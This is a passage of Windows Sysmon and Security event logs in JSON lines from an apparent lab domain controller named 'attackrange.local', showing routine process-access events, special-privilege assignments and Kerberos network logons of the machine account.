1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6630,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220700,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3A57\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa3a57","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220701,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA3A57\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t0\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa3a57","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"0","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220702,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3AA2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa3aa2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220703,"ProcessID":864,"ThreadID":3168,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA3AA2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t10.0.1.14\r\n\tSource Port:\t\t50236\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-6178966$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xa3aa2","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{77AE7113-A264-8FEA-3CEA-ABED442060A2}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"10.0.1.14","IpPort":"50236","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:48.164\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:48.164","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220704,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xA3B10\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xa3b10","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 08:03:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220705,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xA3B10\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{77AE7113-A264-8FEA-3CEA-ABED442060A2}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::286a:52de:ea43:8266\r\n\tSource Port:\t\t50237\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a 